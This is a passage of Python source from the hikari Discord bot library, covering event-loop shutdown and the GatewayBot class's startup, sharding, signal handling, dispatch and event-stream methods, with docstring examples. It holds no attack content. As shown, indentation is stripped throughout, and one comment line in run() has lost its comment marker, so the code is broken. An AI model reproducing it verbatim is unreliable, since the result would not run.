future.cancel()
await future
except asyncio.CancelledError:
pass
except Exception as ex:
loop.call_exception_handler(
{
"message": "Future raised unexpected exception after requesting cancellation",
"exception": ex,
"future": future,
}
)
remaining_tasks = [t for t in asyncio.all_tasks(loop) if not t.done()]
if remaining_tasks:
_LOGGER.debug("terminating %s remaining tasks forcefully", len(remaining_tasks))
loop.run_until_complete(_gather((murder(task) for task in remaining_tasks)))
else:
_LOGGER.debug("No remaining tasks exist, good job!")
if sys.version_info >= (3, 9):
_LOGGER.debug("shutting down default executor")
try:
# This seems to raise a NotImplementedError when running with uvloop.
loop.run_until_complete(loop.shutdown_default_executor())
except NotImplementedError:
pass
_LOGGER.debug("shutting down asyncgens")
loop.run_until_complete(loop.shutdown_asyncgens())
_LOGGER.debug("closing event loop")
loop.close()
# Closed loops cannot be re-used so it should also be un-set.
asyncio.set_event_loop(None)
def _validate_activity(activity: undefined.UndefinedNoneOr[presences.Activity]) -> None:
# This seems to cause confusion for a lot of people, so lets add some warnings into the mix.
if activity is undefined.UNDEFINED or activity is None:
return
# If you ever change where this is called from, make sure to check the stacklevels are correct
# or the code preview in the warning will be wrong...
if activity.type is presences.ActivityType.CUSTOM:
warnings.warn(
"The CUSTOM activity type is not supported by bots at the time of writing, and may therefore not have "
"any effect if used.",
category=errors.HikariWarning,
stacklevel=3,
)
elif activity.type is presences.ActivityType.STREAMING and activity.url is None:
warnings.warn(
"The STREAMING activity type requires a 'url' parameter pointing to a valid Twitch or YouTube video "
"URL to be specified on the activity for the presence update to have any effect.",
category=errors.HikariWarning,
stacklevel=3,
)
class GatewayBot(traits.GatewayBotAware):
"""Basic auto-sharding bot implementation.
This is the class you will want to use to start, control, and build a bot
with.
Parameters
----------
token : builtins.str
The bot token to sign in with.
Other Parameters
----------------
allow_color : builtins.bool
Defaulting to `builtins.True`, this will enable coloured console logs
on any platform that is a TTY.
Setting a `"CLICOLOR"` environment variable to any **non `0`** value
will override this setting.
Users should consider this advice to the application on whether it is
safe to show colours or not. Since some terminals can be
awkward or not support features in a standard way, the option to
explicitly disable this is provided. See `force_color` for an
alternative.
banner : typing.Optional[builtins.str]
The package to search for a `banner.txt` in. Defaults to `"hikari"` for
the `"hikari/banner.txt"` banner.
Setting this to `builtins.None` will disable the banner being shown.
executor : typing.Optional[concurrent.futures.Executor]
Defaults to `builtins.None`. If non-`builtins.None`, then this executor
is used instead of the `concurrent.futures.ThreadPoolExecutor` attached
to the `asyncio.AbstractEventLoop` that the bot will run on. This
executor is used primarily for file-IO.
While mainly supporting the `concurrent.futures.ThreadPoolExecutor`
implementation in the standard lib, Hikari's file handling systems
should also work with `concurrent.futures.ProcessPoolExecutor`, which
relies on all objects used in IPC to be `pickle`able. Many third-party
libraries will not support this fully though, so your mileage may vary
on using ProcessPoolExecutor implementations with this parameter.
force_color : builtins.bool
Defaults to `builtins.False`. If `builtins.True`, then this application
will __force__ colour to be used in console-based output. Specifying a
`"CLICOLOR_FORCE"` environment variable with a non-`"0"` value will
override this setting.
cache_settings : typing.Optional[hikari.impl.config.CacheSettings]
Optional cache settings. If unspecified, will use the defaults.
http_settings : typing.Optional[hikari.impl.config.HTTPSettings]
Optional custom HTTP configuration settings to use. Allows you to
customise functionality such as whether SSL-verification is enabled,
what timeouts `aiohttp` should expect to use for requests, and behavior
regarding HTTP-redirects.
intents : hikari.intents.Intents
Defaults to `hikari.intents.Intents.ALL_UNPRIVILEGED`. This allows you
to change which intents your application will use on the gateway. This
can be used to control and change the types of events you will receive.
logs : typing.Union[builtins.None, LoggerLevel, typing.Dict[str, typing.Any]]
Defaults to `"INFO"`.
If `builtins.None`, then the Python logging system is left uninitialized
on startup, and you will need to configure it manually to view most
logs that are output by components of this library.
If one of the valid values in a `LoggerLevel`, then this will match a
call to `colorlog.basicConfig` (a facade for `logging.basicConfig` with
additional conduit for enabling coloured logging levels) with the
`level` kwarg matching this value.
If a `typing.Dict[str, typing.Any]` equivalent, then this value is
passed to `logging.config.dictConfig` to allow the user to provide a
specialized logging configuration of their choice. If any handlers are
defined in the dict, default handlers will not be setup.
As a side note, you can always opt to leave this on the default value
and then use an incremental `logging.config.dictConfig` that applies
any additional changes on top of the base configuration, if you prefer.
An example of this can be found in the `Example` section.
Note that `"TRACE_HIKARI"` is a library-specific logging level
which is expected to be more verbose than `"DEBUG"`.
max_rate_limit : builtins.float
The max number of seconds to backoff for when rate limited. Anything
greater than this will instead raise an error.
This defaults to five minutes if left to the default value. This is to
stop potentially indefinitely waiting on an endpoint, which is almost
never what you want to do if giving a response to a user.
You can set this to `float("inf")` to disable this check entirely.
Note that this only applies to the REST API component that communicates
with Discord, and will not affect sharding or third party HTTP endpoints
that may be in use.
max_retries : typing.Optional[builtins.int]
Maximum number of times a request will be retried if
it fails with a `5xx` status. Defaults to 3 if set to `builtins.None`.
proxy_settings : typing.Optional[hikari.impl.config.ProxySettings]
Custom proxy settings to use with network-layer logic
in your application to get through an HTTP-proxy.
rest_url : typing.Optional[builtins.str]
Defaults to the Discord REST API URL if `builtins.None`. Can be
overridden if you are attempting to point to an unofficial endpoint, or
if you are attempting to mock/stub the Discord API for any reason.
Generally you do not want to change this.
!!! note
`force_color` will always take precedence over `allow_color`.
!!! note
Settings that control the gateway session are provided to the
`GatewayBot.run` and `GatewayBot.start` functions in this class. This is done
to allow you to contextually customise details such as sharding
configuration without having to re-initialize the entire application
each time.
Example
-------
Setting up logging using a dictionary configuration:
```py
import os
import hikari
# We want to make gateway logs output as DEBUG, and TRACE for all ratelimit content.
bot = hikari.GatewayBot(
token=os.environ["BOT_TOKEN"],
logs={
"version": 1,
"incremental": True,
"loggers": {
"hikari.gateway": {"level": "DEBUG"},
"hikari.ratelimits": {"level": "TRACE_HIKARI"},
},
},
)
```
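A minimal end-to-end sketch is shown below; it assumes the token is supplied
through a `BOT_TOKEN` environment variable and leaves the listener body as a
placeholder:
```py
import os
import hikari
from hikari.events.messages import MessageCreateEvent
bot = hikari.GatewayBot(token=os.environ["BOT_TOKEN"])
@bot.listen(MessageCreateEvent)
async def on_message(event: MessageCreateEvent) -> None:
...  # react to the message here
bot.run()
```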
"""
__slots__: typing.Sequence[str] = (
"_cache",
"_closing_event",
"_closed_event",
"_entity_factory",
"_event_manager",
"_event_factory",
"_executor",
"_http_settings",
"_intents",
"_is_alive",
"_proxy_settings",
"_rest",
"_shards",
"_token",
"_voice",
"shards",
)
def __init__(
self,
token: str,
*,
allow_color: bool = True,
banner: typing.Optional[str] = "hikari",
executor: typing.Optional[concurrent.futures.Executor] = None,
force_color: bool = False,
cache_settings: typing.Optional[config_impl.CacheSettings] = None,
http_settings: typing.Optional[config_impl.HTTPSettings] = None,
intents: intents_.Intents = intents_.Intents.ALL_UNPRIVILEGED,
logs: typing.Union[None, int, str, typing.Dict[str, typing.Any]] = "INFO",
max_rate_limit: float = 300,
max_retries: int = 3,
proxy_settings: typing.Optional[config_impl.ProxySettings] = None,
rest_url: typing.Optional[str] = None,
) -> None:
# Beautification and logging
ux.init_logging(logs, allow_color, force_color)
self.print_banner(banner, allow_color, force_color)
# Settings and state
self._closing_event: typing.Optional[asyncio.Event] = None
self._closed_event: typing.Optional[asyncio.Event] = None
self._is_alive = False
self._executor = executor
self._http_settings = http_settings if http_settings is not None else config_impl.HTTPSettings()
self._intents = intents
self._proxy_settings = proxy_settings if proxy_settings is not None else config_impl.ProxySettings()
self._token = token.strip()
# Caching
cache_settings = cache_settings if cache_settings is not None else config_impl.CacheSettings()
self._cache = cache_impl.CacheImpl(self, cache_settings)
# Entity creation
self._entity_factory = entity_factory_impl.EntityFactoryImpl(self)
# Event creation
self._event_factory = event_factory_impl.EventFactoryImpl(self)
# Event handling
self._event_manager = event_manager_impl.EventManagerImpl(self._event_factory, self._intents, cache=self._cache)
# Voice subsystem
self._voice = voice_impl.VoiceComponentImpl(self)
# RESTful API.
self._rest = rest_impl.RESTClientImpl(
cache=self._cache,
entity_factory=self._entity_factory,
executor=self._executor,
http_settings=self._http_settings,
max_rate_limit=max_rate_limit,
proxy_settings=self._proxy_settings,
rest_url=rest_url,
max_retries=max_retries,
token=token,
token_type=applications.TokenType.BOT,
)
# We populate these on startup instead, as we need to possibly make some
# HTTP requests to determine what to put in this mapping.
self._shards: typing.Dict[int, gateway_shard.GatewayShard] = {}
self.shards: typing.Mapping[int, gateway_shard.GatewayShard] = types.MappingProxyType(self._shards)
@property
def cache(self) -> cache_.Cache:
return self._cache
@property
def event_manager(self) -> event_manager_.EventManager:
return self._event_manager
@property
def entity_factory(self) -> entity_factory_.EntityFactory:
return self._entity_factory
@property
def event_factory(self) -> event_factory_.EventFactory:
return self._event_factory
@property
def executor(self) -> typing.Optional[concurrent.futures.Executor]:
return self._executor
@property
def heartbeat_latencies(self) -> typing.Mapping[int, float]:
return {s.id: s.heartbeat_latency for s in self._shards.values()}
@property
def heartbeat_latency(self) -> float:
latencies = [s.heartbeat_latency for s in self._shards.values() if not math.isnan(s.heartbeat_latency)]
return sum(latencies) / len(latencies) if latencies else float("nan")
@property
def http_settings(self) -> config_impl.HTTPSettings:
return self._http_settings
@property
def intents(self) -> intents_.Intents:
return self._intents
@property
def proxy_settings(self) -> config_impl.ProxySettings:
return self._proxy_settings
@property
def shard_count(self) -> int:
return next(iter(self._shards.values())).shard_count if self._shards else 0
@property
def voice(self) -> voice_.VoiceComponent:
return self._voice
@property
def rest(self) -> rest_.RESTClient:
return self._rest
@property
def is_alive(self) -> bool:
return self._is_alive
def _check_if_alive(self) -> None:
if not self._is_alive:
raise errors.ComponentStateConflictError("bot is not running so it cannot be interacted with")
def get_me(self) -> typing.Optional[users_.OwnUser]:
return self._cache.get_me()
async def close(self) -> None:
self._check_if_alive()
await self._close()
async def _close(self) -> None:
if self._closed_event: # Closing is in progress from another call, wait for that to complete.
await self._closed_event.wait()
return
if self._closing_event is None: # If closing event is None then this is already closed.
return
_LOGGER.debug("bot requested to shutdown")
self._closed_event = asyncio.Event()
self._closing_event.set()
self._closing_event = None
dispatch_events = self._is_alive
loop = asyncio.get_running_loop()
async def handle(name: str, awaitable: typing.Awaitable[typing.Any]) -> None:
future = asyncio.ensure_future(awaitable)
try:
await future
except Exception as ex:
loop.call_exception_handler(
{
"message": f"{name} raised an exception during shutdown",
"future": future,
"exception": ex,
}
)
if dispatch_events:
await self._event_manager.dispatch(self._event_factory.deserialize_stopping_event())
_LOGGER.log(ux.TRACE, "StoppingEvent dispatch completed, now beginning termination")
calls = [
("rest", self._rest.close()),
("voice handler", self._voice.close()),
*((f"shard {s.id}", s.close()) for s in self._shards.values()),
]
for coro in asyncio.as_completed([handle(*pair) for pair in calls]):
await coro
# Clear out cache and shard map
self._cache.clear()
self._shards.clear()
self._is_alive = False
if dispatch_events:
await self._event_manager.dispatch(self._event_factory.deserialize_stopped_event())
self._closed_event.set()
self._closed_event = None
def dispatch(self, event: event_manager_.EventT_inv) -> asyncio.Future[typing.Any]:
"""Dispatch an event.
Parameters
----------
event : hikari.events.base_events.Event
The event to dispatch.
Example
-------
We can dispatch custom events by first defining a class that
derives from `hikari.events.base_events.Event`.
```py
import attr
from hikari.traits import RESTAware
from hikari.events.base_events import Event
from hikari.users import User
from hikari.snowflakes import Snowflake
@attr.define()
class EveryoneMentionedEvent(Event):
app: RESTAware = attr.field()
author: User = attr.field()
'''The user who mentioned everyone.'''
content: str = attr.field()
'''The message that was sent.'''
message_id: Snowflake = attr.field()
'''The message ID.'''
channel_id: Snowflake = attr.field()
'''The channel ID.'''
```
We can then dispatch our event as we see fit.
```py
from hikari.events.messages import MessageCreateEvent
@bot.listen(MessageCreateEvent)
async def on_message(event):
if "@everyone" in event.content or "@here" in event.content:
event = EveryoneMentionedEvent(
app=event.app,
author=event.author,
content=event.content,
message_id=event.message_id,
channel_id=event.channel_id,
)
bot.dispatch(event)
```
This event can be listened to elsewhere by subscribing to it with
`EventManager.subscribe`.
```py
@bot.listen(EveryoneMentionedEvent)
async def on_everyone_mentioned(event):
print(event.author, "just pinged everyone in", event.channel_id)
```
Returns
-------
asyncio.Future[typing.Any]
A future that can be optionally awaited. If awaited, the future
will complete once all corresponding event listeners have been
invoked. If not awaited, this will schedule the dispatch of the
events in the background for later.
See Also
--------
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
return self._event_manager.dispatch(event)
def get_listeners(
self, event_type: typing.Type[event_manager_.EventT_co], /, *, polymorphic: bool = True
) -> typing.Collection[event_manager_.CallbackT[event_manager_.EventT_co]]:
"""Get the listeners for a given event type, if there are any.
Parameters
----------
event_type : typing.Type[T]
The event type to look for.
`T` must be a subclass of `hikari.events.base_events.Event`.
polymorphic : builtins.bool
If `builtins.True`, this will also return the listeners of the
subclasses of the given event type. If `builtins.False`, then
only listeners for this class specifically are returned. The
default is `builtins.True`.
Returns
-------
typing.Collection[typing.Callable[[T], typing.Coroutine[typing.Any, typing.Any, builtins.None]]]
A copy of the collection of listeners for the event. Will return
an empty collection if nothing is registered.
`T` must be a subclass of `hikari.events.base_events.Event`.
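Example
-------
A small sketch (the event type here is purely illustrative) showing how the
`polymorphic` flag narrows the lookup to exactly one event class:
```py
from hikari.events.messages import MessageCreateEvent
# Listeners registered for MessageCreateEvent itself, ignoring its subclasses.
callbacks = bot.get_listeners(MessageCreateEvent, polymorphic=False)
```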
"""
return self._event_manager.get_listeners(event_type, polymorphic=polymorphic)
async def join(self, until_close: bool = True) -> None:
self._check_if_alive()
awaitables: typing.List[typing.Awaitable[typing.Any]] = [s.join() for s in self._shards.values()]
if until_close and self._closing_event: # If closing event is None then this is already closing.
awaitables.append(self._closing_event.wait())
await aio.first_completed(*awaitables)
def listen(
self, event_type: typing.Optional[typing.Type[event_manager_.EventT_co]] = None
) -> typing.Callable[
[event_manager_.CallbackT[event_manager_.EventT_co]],
event_manager_.CallbackT[event_manager_.EventT_co],
]:
"""Generate a decorator to subscribe a callback to an event type.
This is a second-order decorator.
Parameters
----------
event_type : typing.Optional[typing.Type[T]]
The event type to subscribe to. The implementation may allow this
to be undefined. If this is the case, the event type will be inferred
instead from the type hints on the function signature.
`T` must be a subclass of `hikari.events.base_events.Event`.
Returns
-------
typing.Callable[[T], T]
A decorator for a coroutine function that passes it to
`EventManager.subscribe` before returning the function
reference.
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
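Example
-------
A sketch of both spellings; inferring the event type from the parameter
annotation only works where the implementation supports it, as noted above:
```py
from hikari.events.messages import MessageCreateEvent
@bot.listen(MessageCreateEvent)
async def on_message(event: MessageCreateEvent) -> None:
...
@bot.listen()
async def on_message_inferred(event: MessageCreateEvent) -> None:
...
```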
"""
return self._event_manager.listen(event_type)
@staticmethod
def print_banner(
banner: typing.Optional[str],
allow_color: bool,
force_color: bool,
extra_args: typing.Optional[typing.Dict[str, str]] = None,
) -> None:
"""Print the banner.
This allows library vendors to override this behaviour, or choose to
inject their own "branding" on top of what hikari provides by default.
Normal users should not need to invoke this function, and can simply
change the `banner` argument passed to the constructor to manipulate
what is displayed.
Parameters
----------
banner : typing.Optional[builtins.str]
The package to find a `banner.txt` in.
allow_color : builtins.bool
A flag that allows advising whether to allow color if supported or
not. Can be overridden by setting a `"CLICOLOR"` environment
variable to a non-`"0"` string.
force_color : builtins.bool
A flag that allows forcing color to always be output, even if the
terminal device may not support it. Setting the `"CLICOLOR_FORCE"`
environment variable to a non-`"0"` string will override this.
!!! note
`force_color` will always take precedence over `allow_color`.
extra_args : typing.Optional[typing.Dict[builtins.str, builtins.str]]
If provided, extra $-substitutions to use when printing the banner.
Default substitutions can not be overwritten.
Raises
------
builtins.ValueError
If `extra_args` contains a default $-substitution.
"""
ux.print_banner(banner, allow_color, force_color, extra_args=extra_args)
def run(
self,
*,
activity: typing.Optional[presences.Activity] = None,
afk: bool = False,
asyncio_debug: typing.Optional[bool] = None,
check_for_updates: bool = True,
close_passed_executor: bool = False,
close_loop: bool = True,
coroutine_tracking_depth: typing.Optional[int] = None,
enable_signal_handlers: typing.Optional[bool] = None,
idle_since: typing.Optional[datetime.datetime] = None,
ignore_session_start_limit: bool = False,
large_threshold: int = 250,
propagate_interrupts: bool = False,
status: presences.Status = presences.Status.ONLINE,
shard_ids: typing.Optional[typing.AbstractSet[int]] = None,
shard_count: typing.Optional[int] = None,
) -> None:
"""Start the bot, wait for all shards to become ready, and then return.
Other Parameters
----------------
activity : typing.Optional[hikari.presences.Activity]
The initial activity to display in the bot user presence, or
`builtins.None` (default) to not show any.
afk : builtins.bool
The initial AFK state to display in the bot user presence, or
`builtins.False` (default) to not show any.
asyncio_debug : builtins.bool
Defaults to `builtins.False`. If `builtins.True`, then debugging is
enabled for the asyncio event loop in use.
check_for_updates : builtins.bool
Defaults to `builtins.True`. If `builtins.True`, will check for
newer versions of `hikari` on PyPI and notify if available.
close_passed_executor : builtins.bool
Defaults to `builtins.False`. If `builtins.True`, any custom
`concurrent.futures.Executor` passed to the constructor will be
shut down when the application terminates. This does not affect the
default executor associated with the event loop, and will not
do anything if you do not provide a custom executor to the
constructor.
close_loop : builtins.bool
Defaults to `builtins.True`. If `builtins.True`, then once the bot
enters a state where all components have shut down permanently
during application shutdown, then all asyncgens and background tasks
will be destroyed, and the event loop will be shut down.
This will wait until all `hikari`-owned `aiohttp` connectors have
had time to attempt to shut down correctly (around 250ms), and on
Python 3.9 and newer, will also shut down the default event loop
executor too.
coroutine_tracking_depth : typing.Optional[builtins.int]
Defaults to `builtins.None`. If an integer value and supported by
the interpreter, then this many nested coroutine calls will be
tracked with their call origin state. This allows you to determine
where non-awaited coroutines may originate from, but generally you
do not want to leave this enabled for performance reasons.
enable_signal_handlers : typing.Optional[builtins.bool]
Defaults to `builtins.True` if this is started in the main thread.
If on a __non-Windows__ OS with builtin support for kernel-level
POSIX signals, then setting this to `builtins.True` will allow
keyboard interrupts and other OS signals to be treated as requests
to shut down the application properly, rather than just killing the
process in a dirty state immediately.
You should leave this enabled unless you plan to implement your own
signal handling yourself.
idle_since : typing.Optional[datetime.datetime]
The `datetime.datetime` the user should be marked as being idle
since, or `builtins.None` (default) to not show this.
ignore_session_start_limit : builtins.bool
Defaults to `builtins.False`. If `builtins.False`, then attempting
to start more sessions than you are allowed in a 24 hour window
will throw a `hikari.errors.GatewayError` rather than going ahead
and hitting the IDENTIFY limit, which may result in your token
being reset. Setting to `builtins.True` disables this behavior.
large_threshold : builtins.int
Threshold for members in a guild before it is treated as being
"large" and no longer sending member details in the `GUILD CREATE`
event. Defaults to `250`.
propagate_interrupts : builtins.bool
Defaults to `builtins.False`. If set to `builtins.True`, then any
internal `hikari.errors.HikariInterrupt` that is raised as a
result of catching an OS level signal will result in the
exception being rethrown once the application has closed. This can
allow you to use hikari signal handlers and still be able to
determine what kind of interrupt the application received after
it closes. When `builtins.False`, nothing is raised and the call
will terminate cleanly and silently where possible instead.
shard_ids : typing.Optional[typing.AbstractSet[builtins.int]]
The shard IDs to create shards for. If not `builtins.None`, then
a non-`None` `shard_count` must ALSO be provided. Defaults to
`builtins.None`, which means the Discord-recommended count is used
for your application instead.
shard_count : typing.Optional[builtins.int]
The number of shards to use in the entire distributed application.
Defaults to `builtins.None` which results in the count being
determined dynamically on startup.
status : hikari.presences.Status
The initial status to show for the user presence on startup.
Defaults to `hikari.presences.Status.ONLINE`.
Raises
------
hikari.errors.ComponentStateConflictError
If bot is already running.
builtins.TypeError
If `shard_ids` is passed without `shard_count`.
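Example
-------
A sketch of starting the bot with an initial presence; the `Activity` fields
shown here are illustrative rather than exhaustive:
```py
from hikari import presences
bot.run(
status=presences.Status.ONLINE,
activity=presences.Activity(
name="the gateway", type=presences.ActivityType.WATCHING
),
)
```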
"""
if self._is_alive:
raise errors.ComponentStateConflictError("bot is already running")
if shard_ids is not None and shard_count is None:
raise TypeError("'shard_ids' must be passed with 'shard_count'")
loop = aio.get_or_make_loop()
signals = ("SIGINT", "SIGTERM")
if asyncio_debug:
loop.set_debug(True)
if coroutine_tracking_depth is not None:
try:
# Provisionally defined in CPython, may be removed without notice.
sys.set_coroutine_origin_tracking_depth(coroutine_tracking_depth)
except AttributeError:
_LOGGER.log(ux.TRACE, "cannot set coroutine tracking depth for sys, no functionality exists for this")
# Throwing this in the handler will lead to lots of fun OS specific shenanigans. So, lets just
# cache it for later, I guess.
interrupt: typing.Optional[errors.HikariInterrupt] = None
loop_thread_id = threading.get_native_id()
def handle_os_interrupt(signum: int, frame: typing.Optional[types.FrameType]) -> None:
# If we use a POSIX system, then raising an exception in here works perfectly and shuts the loop down
# with an exception, which is good.
# Windows, however, is special on this front. On Windows, the exception is caught by whatever was
# currently running on the event loop at the time, which is annoying for us, as this could be fired into
# the task for an event dispatch, for example, which is a guarded call that is never waited for by design.
# We can't always safely intercept this either, as Windows does not allow us to use asyncio loop
# signal listeners (since Windows doesn't have kernel-level signals, only emulated system calls
for a select few standard C signal types). Thus, the best solution here is to set the close bit
# instead, which will let the bot start to clean itself up as if the user closed it manually via a call
# to `bot.close()`.
nonlocal interrupt
signame = signal.strsignal(signum)
assert signame is not None # Will always be True
interrupt = errors.HikariInterrupt(signum, signame)
# The loop may or may not be running, depending on the state of the application when this occurs.
# Signals on POSIX only occur on the main thread usually, too, so we need to ensure this is
# threadsafe if we want the user's application to still shut down if on a separate thread.
# We log native thread IDs purely for debugging purposes.
if _LOGGER.isEnabledFor(ux.TRACE):
_LOGGER.log(
ux.TRACE,
"interrupt %s occurred on thread %s, bot on thread %s will be notified to shut down shortly\n"
"Stacktrace for developer sanity:\n%s",
signum,
threading.get_native_id(),
loop_thread_id,
"".join(traceback.format_stack(frame)),
)
asyncio.run_coroutine_threadsafe(self._set_close_flag(signame, signum), loop)
if enable_signal_handlers is None:
# Signal handlers can only be registered on the main thread so we
# only default to True if this is the case.
enable_signal_handlers = threading.current_thread() is threading.main_thread()
if enable_signal_handlers:
for sig in signals:
try:
signum = getattr(signal, sig)
signal.signal(signum, handle_os_interrupt)
except AttributeError:
_LOGGER.log(ux.TRACE, "signal %s is not implemented on your platform", sig)
try:
loop.run_until_complete(
self.start(
activity=activity,
afk=afk,
check_for_updates=check_for_updates,
idle_since=idle_since,
ignore_session_start_limit=ignore_session_start_limit,
large_threshold=large_threshold,
shard_ids=shard_ids,
shard_count=shard_count,
status=status,
)
)
loop.run_until_complete(self.join())
finally:
try:
loop.run_until_complete(self._close())
if close_passed_executor and self._executor is not None:
_LOGGER.debug("shutting down executor %s", self._executor)
self._executor.shutdown(wait=True)
self._executor = None
finally:
if enable_signal_handlers:
for sig in signals:
try:
signum = getattr(signal, sig)
signal.signal(signum, signal.SIG_DFL)
except AttributeError:
# Signal not implemented probably. We should have logged this earlier.
pass
if close_loop:
_destroy_loop(loop)
_LOGGER.info("successfully terminated")
if propagate_interrupts and interrupt is not None:
raise interrupt
async def start(
self,
*,
activity: typing.Optional[presences.Activity] = None,
afk: bool = False,
check_for_updates: bool = True,
idle_since: typing.Optional[datetime.datetime] = None,
ignore_session_start_limit: bool = False,
large_threshold: int = 250,
shard_ids: typing.Optional[typing.AbstractSet[int]] = None,
shard_count: typing.Optional[int] = None,
status: presences.Status = presences.Status.ONLINE,
) -> None:
"""Start the bot, wait for all shards to become ready, and then return.
Other Parameters
----------------
activity : typing.Optional[hikari.presences.Activity]
The initial activity to display in the bot user presence, or
`builtins.None` (default) to not show any.
afk : builtins.bool
The initial AFK state to display in the bot user presence, or
`builtins.False` (default) to not show any.
check_for_updates : builtins.bool
Defaults to `builtins.True`. If `builtins.True`, will check for
newer versions of `hikari` on PyPI and notify if available.
idle_since : typing.Optional[datetime.datetime]
The `datetime.datetime` the user should be marked as being idle
since, or `builtins.None` (default) to not show this.
ignore_session_start_limit : builtins.bool
Defaults to `builtins.False`. If `builtins.False`, then attempting
to start more sessions than you are allowed in a 24 hour window
will throw a `hikari.errors.GatewayError` rather than going ahead
and hitting the IDENTIFY limit, which may result in your token
being reset. Setting to `builtins.True` disables this behavior.
large_threshold : builtins.int
Threshold for members in a guild before it is treated as being
"large" and no longer sending member details in the `GUILD CREATE`
event. Defaults to `250`.
shard_ids : typing.Optional[typing.AbstractSet[builtins.int]]
The shard IDs to create shards for. If not `builtins.None`, then
a non-`None` `shard_count` must ALSO be provided. Defaults to
`builtins.None`, which means the Discord-recommended count is used
for your application instead.
shard_count : typing.Optional[builtins.int]
The number of shards to use in the entire distributed application.
Defaults to `builtins.None` which results in the count being
determined dynamically on startup.
status : hikari.presences.Status
The initial status to show for the user presence on startup.
Defaults to `hikari.presences.Status.ONLINE`.
Raises
------
hikari.errors.ComponentStateConflictError
If bot is already running.
builtins.TypeError
If `shard_ids` is passed without `shard_count`.
"""
if self._is_alive:
raise errors.ComponentStateConflictError("bot is already running")
if shard_ids is not None and shard_count is None:
raise TypeError("'shard_ids' must be passed with 'shard_count'")
_validate_activity(activity)
start_time = time.monotonic()
self._rest.start()
self._voice.start()
self._closing_event = asyncio.Event()
self._is_alive = True
if check_for_updates:
asyncio.create_task(
ux.check_for_updates(self._http_settings, self._proxy_settings),
name="check for package updates",
)
requirements = await self._rest.fetch_gateway_bot_info()
await self._event_manager.dispatch(self._event_factory.deserialize_starting_event())
if shard_count is None:
shard_count = requirements.shard_count
if shard_ids is None:
shard_ids = set(range(shard_count))
if requirements.session_start_limit.remaining < len(shard_ids) and not ignore_session_start_limit:
_LOGGER.critical(
"would have started %s session%s, but you only have %s session%s remaining until %s. Starting more "
"sessions than you are allowed to start may result in your token being reset. To skip this message, "
"use bot.run(..., ignore_session_start_limit=True) or bot.start(..., ignore_session_start_limit=True)",
len(shard_ids),
"s" if len(shard_ids) != 1 else "",
requirements.session_start_limit.remaining,
"s" if requirements.session_start_limit.remaining != 1 else "",
requirements.session_start_limit.reset_at,
)
raise errors.GatewayError("Attempted to start more sessions than were allowed in the given time-window")
_LOGGER.info(
"you can start %s session%s before the next window which starts at %s; planning to start %s session%s... ",
requirements.session_start_limit.remaining,
"s" if requirements.session_start_limit.remaining != 1 else "",
requirements.session_start_limit.reset_at,
len(shard_ids),
"s" if len(shard_ids) != 1 else "",
)
for window_start in range(0, shard_count, requirements.session_start_limit.max_concurrency):
window = [
candidate_shard_id
for candidate_shard_id in range(
window_start, window_start + requirements.session_start_limit.max_concurrency
)
if candidate_shard_id in shard_ids
]
if not window:
continue
if self._shards:
close_waiter = asyncio.create_task(self._closing_event.wait())
shard_joiners = [s.join() for s in self._shards.values()]
try:
# Attempt to wait for all started shards, for 5 seconds, along with the close
# waiter.
# If the close flag is set (i.e. user invoked bot.close), or one or more shards
# die in this time, we shut down immediately.
# If we time out, the joining tasks get discarded and we spin up the next
# block of shards, if applicable.
_LOGGER.info("the next startup window is in 5 seconds, please wait...")
await aio.first_completed(aio.all_of(*shard_joiners, timeout=5), close_waiter)
if not close_waiter.cancelled():
_LOGGER.info("requested to shut down during startup of shards")
else:
_LOGGER.critical("one or more shards shut down unexpectedly during bot startup")
return
except asyncio.TimeoutError:
# If any shards stopped silently, we should close.
if any(not s.is_alive for s in self._shards.values()):
_LOGGER.warning("one of the shards has been manually shut down (no error), will now shut down")
await self._close()
return
# new window starts.
except Exception as ex:
_LOGGER.critical("an exception occurred in one of the started shards during bot startup: %r", ex)
raise
await aio.all_of(
*(
self._start_one_shard(
activity=activity,
afk=afk,
idle_since=idle_since,
status=status,
large_threshold=large_threshold,
shard_id=candidate_shard_id,
shard_count=shard_count,
url=requirements.url,
closing_event=self._closing_event,
)
for candidate_shard_id in window
if candidate_shard_id in shard_ids
)
)
await self._event_manager.dispatch(self._event_factory.deserialize_started_event())
_LOGGER.info("started successfully in approx %.2f seconds", time.monotonic() - start_time)
def stream(
self,
event_type: typing.Type[event_manager_.EventT_co],
/,
timeout: typing.Union[float, int, None],
limit: typing.Optional[int] = None,
) -> event_manager_.EventStream[event_manager_.EventT_co]:
"""Return a stream iterator for the given event and sub-events.
Parameters
----------
event_type : typing.Type[hikari.events.base_events.Event]
The event type to listen for. This will listen for subclasses of
this type additionally.
timeout : typing.Optional[builtins.int, builtins.float]
How long this streamer should wait for the next event before
ending the iteration. If `builtins.None` then this will continue
until explicitly broken from.
limit : typing.Optional[builtins.int]
The limit for how many events this should queue at one time before
dropping extra incoming events, leave this as `builtins.None` for
the cache size to be unlimited.
Returns
-------
EventStream[hikari.events.base_events.Event]
The async iterator to handle streamed events. This must be started
with `with stream:` or `stream.open()` before
asynchronously iterating over it.
!!! warning
If you use `stream.open()` to start the stream then you must
also close it with `stream.close()` otherwise it may queue
events in memory indefinitely.
Examples
--------
```py
with bot.stream(events.ReactionAddEvent, timeout=30).filter(("message_id", message.id)) as stream:
async for user_id in stream.map("user_id").limit(50):
...
```
or using `open()` and `close()`
```py
stream = bot.stream(events.ReactionAddEvent, timeout=30).filter(("message_id", message.id))
stream.open()
async for user_id in stream.map("user_id").limit(50):
...
stream.close()
```
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
self._check_if_alive()
return self._event_manager.stream(event_type, timeout=timeout, limit=limit)
